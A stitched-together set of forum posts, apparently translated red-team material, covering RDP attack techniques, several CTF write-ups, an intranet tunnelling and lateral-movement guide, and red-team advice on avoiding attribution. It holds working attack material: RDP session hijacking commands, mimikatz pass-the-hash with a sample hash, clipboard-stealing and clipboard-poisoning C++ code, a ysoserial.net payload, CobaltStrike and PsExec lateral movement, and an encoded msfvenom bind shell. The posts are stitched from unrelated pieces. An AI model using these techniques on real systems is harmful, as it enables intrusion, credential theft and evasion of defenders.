2. Services

```
quser
sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1"
net start sesshijack
```

3. mimikatz

```
privilege::debug
ts::sessions
token::elevate
ts::remote /id:2
```

4. Shift password-free hijacking; COM hijacking; Shift backdoor in a webshell.

rdpclip.exe utilization

The RDP service can copy and paste text and files. This is mainly implemented through the rdpclip.exe process. If you want to know the specific operation of a copy, you can use ClipSpy to view the changes in the clipboard. I have seen many disclosed methods in ATT&CK of using the clipboard to obtain the copied text content, and there is also an idea given in https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/ (hooking RDPClip.exe).

1. Clipboard monitoring

Every 10 seconds, read the clipboard content and save it locally.

```cpp
#include <exception>
#include <iostream>
#include <ostream>
#include <stdexcept>
#include <string>
#include <windows.h>
#include <fstream>
using namespace std;

class RaiiClipboard {
public:
    RaiiClipboard() {
        if (!OpenClipboard(NULL))
            throw runtime_error("Can't open clipboard.");
        // ... or define some custom exception class for clipboard errors.
    }
    ~RaiiClipboard() {
        CloseClipboard();
    }
    // Ban copy
private:
    RaiiClipboard(const RaiiClipboard&);
    RaiiClipboard& operator=(const RaiiClipboard&);
};

class RaiiTextGlobalLock {
public:
    explicit RaiiTextGlobalLock(HANDLE hData) : m_hData(hData) {
        m_psz = static_cast<const char*>(GlobalLock(m_hData));
        if (!m_psz)
            throw runtime_error("Can't acquire lock on clipboard text.");
    }
    ~RaiiTextGlobalLock() {
        GlobalUnlock(m_hData);
    }
    const char* Get() const {
        return m_psz;
    }
private:
    HANDLE m_hData;
    const char* m_psz;
    // Ban copy
    RaiiTextGlobalLock(const RaiiTextGlobalLock&);
    RaiiTextGlobalLock& operator=(const RaiiTextGlobalLock&);
};

string GetClipboardText() {
    RaiiClipboard clipboard;
    HANDLE hData = GetClipboardData(CF_TEXT);
    if (hData == NULL) {
        return "";
        // throw runtime_error("Can't get clipboard text.");
    }
    RaiiTextGlobalLock textGlobalLock(hData);
    string text(textGlobalLock.Get());
    return text;
}

void SaveData(string data) {
    ofstream out("info.txt", ios::app);
    if (out.is_open()) {
        out << data + "\n";
        out << "------------------------------\n";
        out.close();
    }
}

int main() {
    static const int kExitOk = 0;
    static const int kExitError = 1;
    string data1 = "";
    string data2 = "";
    try {
        while (true) {
            data2 = GetClipboardText();
            if (data1 != data2) {
                cout << data2 << endl;
                SaveData(data2);
            } else {
                cout << "waiting for clip acting." << endl;
                Sleep(300000);
            }
            data1 = data2;
            Sleep(10000);
        }
        return kExitOk;
    } catch (const exception& e) {
        cerr << "*** ERROR: " << e.what() << endl;
        return kExitError;
    }
}
```

According to the Cheesy Rumbles article, you can also use Get-ClipboardContents.ps1 to get the clipboard content, and it can be obtained across multiple RDP sessions.

```
3924 888 rdpclip.exe x64 3 DMZ2\rasta
inject 3924 x64 smb
powershell-import D:\Tools\Get-ClipboardContents.ps1
powershell Get-ClipboardContents -PollInterval 1
```

2. Counterattacking RDP

How to transfer files to the administrator in reverse without a mounted drive? I found two methods online.

1. Hooking the GetClipboardData function and the DragQueryFileW function works similarly. After two days of debugging, I finally got it with the help of all the brothers.

2. Later I thought that, since I could get the clipboard contents as in the previous section, I could modify the file he copied. CVE-2019-0887: Li Yongde has the same idea as the one given in the paper. Since wcsrchr(szFile, '\\') is used to receive the path, Microsoft also supports ./ style paths. The cause of the vulnerability is similar to the WinRAR path one. Use the Detours library to hook the GetClipboardData function and the DragQueryFileW function, and add file data and paths to achieve the final effect.

Replace the clipboard file:

```c
#include <iostream>
#include <windows.h>
#include <shlobj.h>

int CopyFileToClipboard(char szFileName[]);

int main() {
    CopyFileToClipboard("C:\\windows\\system32\\cmd.exe");
    return 0;
}

int CopyFileToClipboard(char szFileName[]) {
    UINT uDropEffect;
    HGLOBAL hGblEffect;
    LPDWORD lpdDropEffect;
    DROPFILES stDrop;
    HGLOBAL hGblFiles;
    LPSTR lpData;

    uDropEffect = RegisterClipboardFormat("Preferred DropEffect");
    hGblEffect = GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD));
    lpdDropEffect = (LPDWORD)GlobalLock(hGblEffect);
    *lpdDropEffect = DROPEFFECT_COPY;  // copy; use DROPEFFECT_MOVE for cut and paste
    GlobalUnlock(hGblEffect);

    stDrop.pFiles = sizeof(DROPFILES);
    stDrop.pt.x = 0;
    stDrop.pt.y = 0;
    stDrop.fNC = FALSE;
    stDrop.fWide = FALSE;

    hGblFiles = GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE,
                            sizeof(DROPFILES) + strlen(szFileName) + 2);
    lpData = (LPSTR)GlobalLock(hGblFiles);
    memcpy(lpData, &stDrop, sizeof(DROPFILES));
    strcpy(lpData + sizeof(DROPFILES), szFileName);
    GlobalUnlock(hGblFiles);

    OpenClipboard(NULL);
    EmptyClipboard();
    SetClipboardData(CF_HDROP, hGblFiles);
    SetClipboardData(uDropEffect, hGblEffect);
    CloseClipboard();
    return 1;
}
```

In this way, after the administrator copies any file from the server and downloads it to his machine, the file will be replaced with cmd.exe.

.NET Deserialization

See the idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/` (I never expected it could be played this way). Use `https://github.com/pwntester/ysoserial.net`. The exploitation process is to replace the clipboard content with serialized code when pasting; the deserialization is triggered when some applications paste it. Moreover, if the target .NET application runs with higher permissions, it can also be used for privilege escalation (the current user does not have the UAC account password, but the administrator had opened a .NET application through UAC earlier).

```
ysoserial.exe -p Clipboard -c calc -F System.String
```

Tested programs: PowerShell ISE, VS, Paint. Any WPF application that uses TextBox, PasswordBox, or RichTextBox is also affected.

RDP PtH

User hash login on Windows via mstsc. The server needs Restricted Admin mode enabled, which is on by default in Windows 8.1 and Windows Server 2012 R2; Win 7 and Windows Server 2008 R2 also support it if the 2871997 and 2973351 patches are installed. The client needs to support Restricted Admin mode.

Turn on Restricted Admin mode:

```
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 000000000 /f
```

When enabled, use `mstsc.exe /restrictedadmin` to log in without a password; the current user's hash will be used for verification.

Mimikatz:

```
mimikatz.exe privilege::debug sekurlsa::pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b "/run:mstsc.exe /restrictedadmin"
```
  16. Guest
    Guest posted a topic in A Test Forum
    1.pyc

    Use pyc to decompile online to get the python source code:

        #!/usr/bin/env python
        # visit https://tool.lu/pyc/ for more information
        # Version: Python 3.8
        import random

        def encrypt_file(file_path):
            random.seed(114514)
            # WARNING: Decompyle incomplete

        file_path = './flag'
        encrypt_file(file_path)

    Then use AI analysis to get its corresponding decryption script:

        import random
        import os

        def decrypt_data(encrypted_data):
            random.seed(114514)
            decrypted_data = bytearray()
            for byte in encrypted_data:
                key = random.randint(0, 128)
                decrypted_data.append(byte ^ key)
            return decrypted_data

        def read_file(file_path, mode='rb'):
            with open(file_path, mode) as file:
                return file.read()

        def write_file(file_path, data, mode='wb'):
            with open(file_path, mode) as file:
                file.write(data)

        def decrypt_file(encrypted_file_path, output_file_path):
            encrypted_data = read_file(encrypted_file_path)
            decrypted_data = decrypt_data(encrypted_data)
            write_file(output_file_path, decrypted_data)

        if __name__ == '__main__':
            encrypted_file_path = 'flag.enc'
            output_file_path = 'flag_decrypted.txt'
            decrypt_file(encrypted_file_path, output_file_path)
        # flag{U_R_g00d_at_do1n_pyc}

    2.MWatch

    Tip: When a data security researcher analyzes the data collected by smart devices in real time, he detects that a device user has had a high value. Please help analyze the highest value. flag{md5(data acquisition device name data reception device name value)}

    Heart Rate appears many times, and you should look for this based on the description of the question. Only check the Heart Rate related records.

    flag{md5(Mi Smart Band 5_Redmi K40_128)}
    flag{453d8feda5adb6e7b4d54f71a9ce9e14}

    3.BabyRSA

    Tip: A certain employee has an initial value that generates prime numbers, and he ran this algorithm for a long time. The program was accidentally terminated and the initial value was accidentally deleted. Can the plaintext be restored?

    Source code:

        # task.py
        #!/usr/bin/env python3
        # -*- coding: utf-8 -*-
        from secret import flag, init
        from Crypto.Util.number import *
        from sage.all import *
        from gmpy2 import iroot

        m = bytes_to_long(flag.encode())
        r = getPrime(128)
        p = init
        # for i in range(r-1):
        #     p += next_prime(init)
        # assert iroot(p,3)[1] == 1
        q = getPrime(12)
        # N = p*q*r
        N = r**4 * q
        e = getPrime(17)
        c = pow(m, e, N)
        print(f'r={r}')
        print(f'e={e}')
        print(f'c={c}')
        # r=287040188443069778047400125757341514899
        # e=96001
        # c=7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

    Blast the 12-bit prime number to get q, and then decrypt:

        from Crypto.Util.number import long_to_bytes, inverse

        r = 287040188443069778047400125757341514899
        e = 96001
        c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

        # Assuming the modulus for the exponentiation should indeed be r**4
        n = r**4
        # Compute the modular inverse of e mod φ(n), where φ(n) could be a function of r, like (r-1)*(r**3)
        # We need the correct value of φ(n) for the RSA decryption formula m=c^d mod n, where d=e^(-1) mod φ(n)
        # Here, assuming φ(n)=r^4 - r^3 as a simplification, you might need to adjust this based on actual RSA setup
        phi_n = r**4 - r**3
        d = inverse(e, phi_n)
        # Decrypt message
        m = pow(c, d, n)
        # Convert number to bytes
        message = long_to_bytes(m)
        print(message)
        # flag{3b0ce326141ea4f6b5bf2f37efbd1b42}

    4.Backpack

    Knapsack encryption; use the BKZ/LLL algorithm to solve a set of bases.

        #!/usr/bin/env python3
        # -*- coding: utf-8 -*-
        from sage.all import *
        from secret import flag
        from Crypto.Util.number import *
        from math import log2

        class Knapsack:
            def __init__(self, n, m):
                self.M = []
                self.n = n
                self.m = self.pre(m)
                self.A = 0
                self.B = 0

            def pre(self, m):
                tmp_m = bin(m)[2:]
                t = []
                for tmp in tmp_m:
                    t.append(int(tmp))
                return t

            def get_M(self):
                seq = [randint(2**34, 2**35) for _ in range(self.n)]
                self.M = seq

            def calc_density(self):
                t = log2(max(self.M))
                d = self.n / t
                print(d)

            def enc(self):
                self.get_M()
                self.calc_density()
                C = 0
                for t in range(len(self.m)):
                    C += self.m[t] * self.M[t]
                print(f'C={C}')
                print(f'M={self.M}')

        if __name__ == '__main__':
            m = bytes_to_long(flag.encode())
            n = m.bit_length()
            k = Knapsack(n, m)
            k.enc()
        # C=231282844744
        # M=[27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920]

    Execute in sagemath:

        from Crypto.Util.number import long_to_bytes

        C = 231282844744
        M = [27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920]

        # Rows (e_i, M_i) plus (0, C): a 0/1 combination of the M_i summing to C
        # shows up as a short row whose last entry is 0.
        L = block_matrix([[1, matrix(ZZ, M).T], [0, C]]).LLL()
        for row in L:
            # A solution row has 0 in the last column and only 0/±1 elsewhere
            if row[-1] == 0 and set(abs(i) for i in row[:-1]) <= {0, 1}:
                ans = [abs(i) for i in row[:-1]]
                ans = int(''.join(map(str, ans)), 2)
                print(long_to_bytes(ans))

    5.Targeted Data Collection

        import openpyxl
        import requests
        import time
        from urllib.parse import urlencode

        burp0_url = 'http://121.40.65.125:23328/submit'

        def separate_name_and_id(input_file, output_file):
            wb = openpyxl.load_workbook(input_file)
            ws = wb.active
            for row in ws.iter_rows(min_row=1, max_col=1, max_row=ws.max_row, values_only=True):
                if row[0]:
                    name, id_number = row[0].split('----')  # Extract name and identity card
                    print(name, id_number)
                    age = 2024 - int(id_number[6:10])
                    if int(id_number[10:12]) > 4:  # birth month not yet reached this year
                        age -= 1
                    sexx = u'male'
                    burp0_json = {'address': 'asd', 'age': str(age), 'ethnicity': 'as', 'experience': '1', 'idcard': id_number, 'name': 'a', 'phonenumber': '12312331233', 'position': 'as', 'sex': sexx}
                    sexx2 = u'female'
                    burp0_json1 = {'address': 'asd', 'age': str(age), 'ethnicity': 'as', 'experience': '1', 'idcard': id_number, 'name': 'a', 'phonenumber': '12312331233', 'position': 'as', 'sex': sexx2}
                    try:
                        r0 = requests.post(burp0_url, json=burp0_json)
                        r1 = requests.post(burp0_url, json=burp0_json1)
                        print(r0.request.body)
                        print(r0.text, r1.text)
                        # time.sleep(0.5)
                    except requests.exceptions.RequestException:
                        print('err')
                        # time.sleep(2)
                    # ws.append([name.strip(), id_number.strip()])
            # wb.save(output_file)
            wb.close()

        if __name__ == '__main__':
            input_file = 'data1.xlsx'
            output_file = 'separated_data.xlsx'  # Not used, discarded
            separate_name_and_id(input_file, output_file)

    6.weather

    Review bundle.js, take the parameters, and access.

    7.mysql cleanup

    Tip: According to the requirements, to completely delete some user data from the database, please connect to the provided mysql container and delete from all ctf tables the users whose ids are 5142, 2123, 1169, and 8623. It is required to clean up these users thoroughly; the residual data must not be findable on the server, and other user data cannot be changed. When the operation is successful, the system will write the flag data into the ctf.flag table. (mysql ctf user password pswd@123)

        DELETE FROM ShoppingCart WHERE user_id in ('5142','2123','1169','8623');
        DELETE FROM TransactionHistory WHERE user_id in ('5142','2123','1169','8623');
        DELETE FROM UserLog WHERE user_id in ('5142','2123','1169','8623');
        DELETE FROM Wallet WHERE user_id in ('5142','2123','1169','8623');
        DELETE FROM User WHERE id in ('5142','2123','1169','8623');

    Rebuild the tables to clear the remaining data after deletion:

        alter table User engine=innodb;
        alter table UserLog engine=innodb;
        alter table TransactionHistory engine=innodb;
        alter table ShoppingCart engine=innodb;
        alter table Orders engine=innodb;

    8.Phantom Square

    There are only eight results for the third-order magic square; just try a few more times.

        import hashlib
        import random
        import string

        # Define the character set as alphanumeric characters
        charset = string.ascii_letters + string.digits

        while True:
            # Generate a random 4-character string from the charset
            rand_str = ''.join(random.choice(charset) for _ in range(4)) + 'CyhQp8lsgzYjTNUD'
            # Calculate the SHA-256 hash of the string
            hash_output = hashlib.sha256(rand_str.encode()).hexdigest()
            # Check if the hash matches the target hash
            if hash_output == '11f8af166cc28e24b4646cc300436f4d4bf8e11b2327379331a3eca2d5fc7c0c':
                print(rand_str[:4])  # Print the first 4 characters if a match is found
                break

        '''
        [2, 7, 6, 9, 5, 1, 4, 3, 8]
        [2, 9, 4, 7, 5, 3, 6, 1, 8]
        [4, 3, 8, 9, 5, 1, 2, 7, 6]
        [4, 9, 2, 3, 5, 7, 8, 1, 6]
        [6, 1, 8, 7, 5, 3, 2, 9, 4]
        [6, 7, 2, 1, 5, 9, 8, 3, 4]
        [8, 1, 6, 3, 5, 7, 4, 9, 2]
        [8, 3, 4, 1, 5, 9, 6, 7, 2]

        4 3 8
        9 5 1
        2 7 6
        '''
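As an added example (not part of the write-up above), here is the RSA arithmetic behind the BabyRSA solution, done with small constructed numbers so every step can be checked by hand. The modulus has the task's shape N = r^4 * q; the code shows the full decryption when q is known, using phi(N) = r^3 (r-1)(q-1), and the partial decryption modulo r^4 alone that the posted solve script relies on, which returns m only when m < r^4 and otherwise returns a truncated value. The primes, exponent and plaintexts are constructed values, not the task's.

```python
# Added example (not from the write-up): the arithmetic behind decrypting
# an RSA ciphertext whose modulus has the BabyRSA shape N = r**4 * q.
# Small constructed parameters are used so every value can be checked by hand;
# they are not the task's numbers.
from math import gcd


def totient_r4q(r: int, q: int) -> int:
    """phi(N) for N = r**4 * q with distinct primes r and q:
    phi(r**4) * phi(q) = r**3 * (r - 1) * (q - 1)."""
    return r ** 3 * (r - 1) * (q - 1)


def decrypt_full(c: int, e: int, r: int, q: int) -> int:
    """Decrypt when both primes are known: d = e^-1 mod phi(N), m = c^d mod N."""
    n = r ** 4 * q
    phi = totient_r4q(r, q)
    if gcd(e, phi) != 1:
        raise ValueError("e has no inverse modulo phi(N)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return pow(c, d, n)


def decrypt_mod_r4(c: int, e: int, r: int) -> int:
    """Decrypt knowing only r, as the posted solve script does.

    Reducing c modulo r**4 gives m**e mod r**4, and phi(r**4) = r**3 * (r - 1),
    so this returns m mod r**4. That equals m exactly when m < r**4 (and
    gcd(m, r) == 1); a longer plaintext comes back truncated, which is the
    failure mode to watch for.
    """
    n = r ** 4
    phi = r ** 3 * (r - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e has no inverse modulo phi(r**4)")
    d = pow(e, -1, phi)
    return pow(c % n, d, n)


def partial_decrypt_is_exact(m_bits: int, r: int) -> bool:
    """Whether a plaintext of m_bits bits is guaranteed to lie below r**4.

    r >= 2**(bitlen(r)-1), so r**4 >= 2**(4*(bitlen(r)-1)); any plaintext with
    at most that many bits is below r**4. For the task r is 128 bits, so r**4
    is about 512 bits and a short flag fits comfortably.
    """
    return m_bits <= 4 * (r.bit_length() - 1)


if __name__ == "__main__":
    r, q, e = 101, 11, 7  # constructed small primes and exponent
    n = r ** 4 * q
    m = 123456            # constructed plaintext, below r**4
    c = pow(m, e, n)
    print(decrypt_full(c, e, r, q), decrypt_mod_r4(c, e, r))
    big = r ** 4 + 5      # constructed plaintext above r**4: partial path truncates
    cb = pow(big, e, n)
    print(decrypt_full(cb, e, r, q), decrypt_mod_r4(cb, e, r))
```

The second plaintext in the demo is deliberately larger than r^4: the full decryption still recovers it, while the r^4-only path returns its residue, which is why the posted script's shortcut works for a short flag but is not a general decryption.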
  17. Guest
    Guest posted a topic in A Test Forum
    Preface

    In intranet penetration, getting a WebShell or launching CobaltStrike, Metasploit, etc. is just the beginning; the bigger part is moving laterally in the intranet, expanding the results, and hitting the core area. However, the prerequisite for post-exploitation is to build an "exclusive channel" into the intranet in order to attack further. In actual combat, the methods used differ with the network environment. The following is a self-summary mind map of "The way of intranet penetration in actual combat".

    Target outbound (socks proxy)

    This is the network environment you most want to encounter in actual combat. The target machine can access the Internet normally, and you can directly hang a socks proxy or CobaltStrike on the target machine to open a channel into the target's intranet.

    Frp (socks5)

    Frp server configuration file:

        [common]
        bind_port = 8080

    Frp client configuration file:

        [common]
        server_addr = xx.xx.xx.xx
        server_port = 8080
        # Service ports use common web ports

        [socks5]
        type = tcp
        remote_port = 8088
        plugin = socks5
        use_encryption = true
        use_compression = true
        # socks5 password
        # plugin_user = SuperMan
        # plugin_passwd = XpO2McWe6nj3

    The two functions of encryption and compression are added here; they are not enabled by default. According to the author's introduction, the compression algorithm uses snappy.

    use_encryption = true: enable encryption [encrypted transmission of the communication content, effectively preventing traffic from being intercepted]
    use_compression = true: enable compression [compresses the transmitted content to effectively reduce the transmitted network traffic and speed up forwarding, but will consume some additional CPU resources]

    use_encryption = true and use_compression = true must be placed under the relevant protocol section.

    After the frp client and configuration file are transferred to the target machine, the program name and configuration file are renamed and placed in system-related folders to hide them.

    Comparison of encryption and compression

    This is the FRP client configuration file that does not use the encryption and compression functions. Metasploit, hung behind the socks proxy, is used to scan, and the data packets transmitted by ms17_010 can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions.

    After using the encryption and compression functions, although the attack source address will still be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet.

    CobaltStrike (socks4a)

    Enable the socks proxy on the Beacon of the controlled target machine.

        beacon> socks 1024    # Port is set according to the actual situation of the VPS

    View Proxy Pivots in the menu bar; copy the proxy and connect it to Metasploit, or directly hang socks4a in related security tools.

    SMB Beacon: for bringing online machines that do not go out of the network. This is a link-type link; as long as the main link (the network Beacon) is disconnected, all of them will be disconnected!

    Official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon gets its tasks from the parent Beacon and sends through it. Because the linked Beacons use Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, so SMB Beacon is relatively hidden.

    Create an SMB Listener (host and port can be ignored); pay attention to the Listener selection, and select the session derived from the host that can be reached by route. After successful operation, you can see the characters ∞∞, which is the connection state of the derived SMB Beacon. It can be connected or disconnected with link host / unlink host on the main Beacon.

        beacon> link 192.168.144.155
        beacon> unlink 192.168.144.155

    Link Listener

    Create a Listener on the online host. Export the executable file or dll corresponding to this type of Listener, selecting the Listener you just created. Upload the payload just generated to the currently online target machine; the PsExec.exe tool is used here (CobaltStrike's own is not powerful enough). Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and bring it online.

        beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe
        beacon> shell netstat -ano | findstr 4444

    SSH Login

        beacon> ssh 192.168.144.174:22 root admin
        beacon> ssh 192.168.144.203:22 root admin

    Check the network connection status in the Linux target machine; it is actually a connection established with the previously launched Windows host.

    The target does not go out of the network (http proxy)

    There may be firewalls, network gates, etc. in the target machine's network that only allow http one-way outflow and cannot access the Internet normally. The socks method above is not feasible, and you can only penetrate using an http proxy.

    reGeorg (socks5)

        python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

    Use metasploit through the reGeorg socks proxy to scan; the data packets transmitted by ms17_010 can clearly identify the attack behavior.

    Neo-reGeorg (encrypted)

        python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx

    After using Neo-reGeorg, the packets are transmitted encrypted.

    Ice Scorpion (open socks5)

    Ice Scorpion's packet transmission is encrypted and it also has a socks proxy function, but there is packet loss during transmission. Here we also use metasploit to detect the ms17_010 vulnerability, but the result shows that it does not exist; when no proxy is set, the vulnerability actually exists. Although Ice Scorpion's proxy scanning is not as accurate as reGeorg, port detection with a small number of threads is feasible, such as auxiliary/scanner/portscan/tcp. Accuracy is determined more by the number of packets in some detections or by other modes of transmission.

    reduh (single-port forwarding)

    When the version of the target server's middleware and other services is low, and reGeorg or Ice Scorpion cannot be parsed normally, you need to use other http proxy scripts. This is the environment encountered in a practical battle; reduh is taken as an example here. Although it only forwards the specified port (graphical connection operation is not applicable), you can first use msfvenom to generate a forward shell payload, then combine reduh single-port forwarding to bring it online in metasploit, and finally use the socks4a module to open the proxy. Let's go through the specific process below:

        sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe

        --platform platform      Specify the target platform for the payload
        -e, --encoder encoder    Specify the encoder to use
        -i, --iterations count   Specify the number of encoding iterations of the payload

    Upload the payload to the target server and execute it. In metasploit, listen on the address and port after forwarding.

        sudo msfconsole -q
        msf5 > use exploit/multi/handler
        msf5 exploit(multi/handler) > set payload windows/shell_bind_tcp
        msf5 exploit(multi/handler) > set rhost 127.0.0.1
        msf5 exploit(multi/handler) > set lport 5353
        msf5 exploit(multi/handler) > run -j

    After reDuhServer is transferred to the target machine, use reDuhClient to connect, and then the forwarded port is opened locally.

        java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspx

        telnet 127.0.0.1 1010
        [createTunnel]5353:127.0.0.1:53

    Once it comes back in metasploit you can penetrate further there, or open a socks4a and mount other security tools to continue penetration.

        msf5 exploit(multi/handler) > use auxiliary/server/socks4a
        msf5 auxiliary(server/socks4a) > set srvport 10080
        msf5 auxiliary(server/socks4a) > run -j

    Note why the payload requires shell instead of meterpreter. Meterpreter is an advanced payload that occupies a large number of data packets during transmission, and this single-port forwarding is not very stable at all; meterpreter will make the "small water pipe" even more unstable!

    Isolated Network (multi-level proxy)

    During intranet penetration, an isolated network will be encountered, which is mostly logically isolated. The breakthrough method is to obtain permissions on a route-accessible springboard machine (multiple network cards, operation and maintenance machines, etc.) and establish first-level, second-level and third-level proxies.

    FRP

    Having now obtained permissions on a dual-network-card intranet server, FRP can be used to establish channels. This server is both a server and a client. After the channel is established with FRP, add two proxies in combination with Proxifier, the external network socks and the intranet socks, and then create a proxy chain (note the proxy order). Set proxy rules and select the corresponding proxy. The second-layer proxy was successful, and port 445 of the intranet isolated machine was detected open.

    Proxychains

    The command-line proxy artifact proxychains sets the second-layer proxy and the socks password (note the proxy order).
  18. Guest
    Recently, I returned to the blue team because I understand it. I occasionally played a guest role in connecting with customers and wrote some summary based on the characteristics of each device I came into contact with. From the vision of the Red Team: how to prevent the source from being traced. ---8sec.cc

    1. Honeypot system

    Browser usage notes

    Single isolated browser: try to use a browser different from your commonly used one during penetration. For example, if Chrome is commonly used, use Firefox for penetration.

    Use traceless mode: Firefox and Chrome have traceless mode. If you do not know the target assets, try to turn on traceless mode for testing.

    The above two methods can mainly avoid honeypots using Jsonp Callback, XSS and other vulnerabilities to obtain the ID and information of the Red Team personnel. However, the fingerprintjs library used in honeypots can determine whether the source visitors are the same person based on the specific identification of different IPs and different browsers, so using traceless mode and different browsers alone will still lead to recognition by honeypots.

    Anti-honeypot plugin

    Bypass Honeypot: AntiHoneypot - A Chrome extension that intercepts honeypot XSSI. Functions: intercept the XSSI requests initiated in the page and block suspicious XSSI (Jsonp Callback, XSS, etc.) through feature identification; analyze and grab the inherent features of honeypots, identify the honeypot and intercept all requests; determine whether the fingerprintjs library exists and prompt; determine whether there are other related calls to decide whether there is a persistent identity; determine whether the clipboard paste has been read (to be further verified); clear all browser data of the current website (including all caches and storage) with one click; determine whether FileSystem is operated in the page (evercookies can be written here).

    2. Prevent countermeasures

    Server / springboard machine

    According to the traceability information obtained by various companies, some of the reasons, apart from honeypots, that a VPS is beaten and routinely taken down may be that the Red Team personnel lack understanding of Linux/Windows operation and maintenance. For example: using Docker to build a vulnerable environment and being escaped; using a one-click environment with default programs and default passwords (phpmyadmin, BT/pma vulnerabilities, information leakage vulnerabilities); nmap's interactive command execution; find suid-bit privilege escalation, etc.

    Server application installation/management

    There must be targeted restrictions when installing different applications: iptables and remote login limit the login sources and the number of brute-force attempts. It is recommended not to give 777 permissions when installing and using software such as CS. This time there were cases of counter-escalation of privileges.

    Running software in a virtual machine

    In the widely circulated counter-cases, there was a situation where the Blue Team's VPN installation package was bundled with a trojan / white-and-black loader and caused the Red Team personnel to go online. Therefore, if you want to download/install targets such as finance (IE controls), VPN, etc., try to operate in a virtual machine as much as possible, roll back the image after each different work/project, and make a backup once the virtual machine's network proxy configuration is completed.

    3. Information hiding

    Hiding the mobile phone number

    Alibaba Small Account has now banned registration and application, and it is estimated that it will be closed in a while. During regular penetration, you can choose to purchase SMS cards, use a code-receiving platform, use an Internet phone to make calls, or buy a real-name card. It is best to achieve physical isolation from daily life.

    Alipay

    Alipay has had a problem before. If you enable the online merchant bank, you can directly see the name of the transfer object when it has three characters. If it has two characters, you can directly use the Alipay transfer function to guess the name based on other information.

    WeChat

    WeChat is also a place where IDs are leaked. Turn off search by mobile phone number and adding friends from WeChat groups, only enable adding friends by QR code, and only allow viewing of Moments within 3 days. Ask your friends to use a fake name for you as much as possible, for example: Zhang xx, Li xx.

    QQ

    The same as WeChat: close non-friend access to the space, set access date restrictions, photo restrictions, photo wall restrictions, and game display. Ask your friends to use a fake name for you as much as possible, for example: Zhang xx, Li xx. I had this problem before with QQ, where the notes between friends leaked my real name. https://zhuanlan.zhihu.com/p/95525409

    qq: get real names of common friends https://github.com/anntsmart/QQ. Although it can no longer be used, it does not mean that no related interfaces have been leaked. For example, if you logged in to qq on the previous t.qq.com, you can log in directly without any security verification and obtain the QQ sealey.

    Network ID hiding

    Try to use some regular characters for common network IDs, such as: Brother Pants, this kind of news figure.

    The real name is hidden/misleading

    Ask your friends to use a fake name for you as much as possible, for example: Zhang xx, Li xx. I had this problem before with QQ, where the notes between friends leaked my real name. Because there will only be more and more information in the social engineering libraries, spending money to hide is purely an ostrich, so you can only hide your true information in various places, such as using fake names + small accounts for takeout/express. Register identity information using information generated online or from a source you know.

    4. Network hiding

    Network hiding needs to be emphasized: the differences between the various proxy methods and which is suitable under what circumstances.

    SS/V2

    Advantages: connection traffic is encrypted/obfuscated. If you use kcp, you can simulate WeChat video traffic.
    Disadvantages: because Socks5 is used, it can only proxy tcp traffic; icmp/udp cannot be proxied, and it is easy to cause leakage due to client forwarding performance problems.

    VPN l2tp/pptp

    Advantages: the traditional dedicated line proxy mode supports global proxy for various systems. The possibility of the key being cracked is not high. The proxy can manually set routes to decide whether different addresses go by different routes; you can set 0.0.0.0 to send the full protocol set through the VPN. Simple to build: openvpn/SoftEtherVPN. Linux construction: https://github.com/hwdsl2/setup-ipsec-vpn/blob/master/README-zh.md
    Disadvantages: when your network is unstable, the background will easily drop directly, and the prompt is very short, so it is easy to run naked directly. It is recommended that only port 1723 be allowed out when the router is restricted, so that if it is disconnected it will not be able to leave the network directly until you connect to the vpn. All l2tp traffic in domestic networks can be decrypted.

    sslvpn

    Product list:
    Advantages: the SSL protocol is mainly composed of the SSL record protocol and the handshake protocol, which together provide authentication, encryption and tamper-proof functions for application access connections. Traffic can be encrypted.
    Disadvantages: SSL vpn is limited to web browser applications and cannot carry some protocols.

    5. Development and application hiding

    Development and compilation desktop users

    During the process of compiling software, it is recommended to compile as the administrator user in a virtual machine. If the user name is leaked after C#/C is compiled, the user name will be leaked, which will cause the ID information to be associated with platforms such as Weibu. PDB files: what every developer must know.

    Github/Blog/WeChat Official Account articles

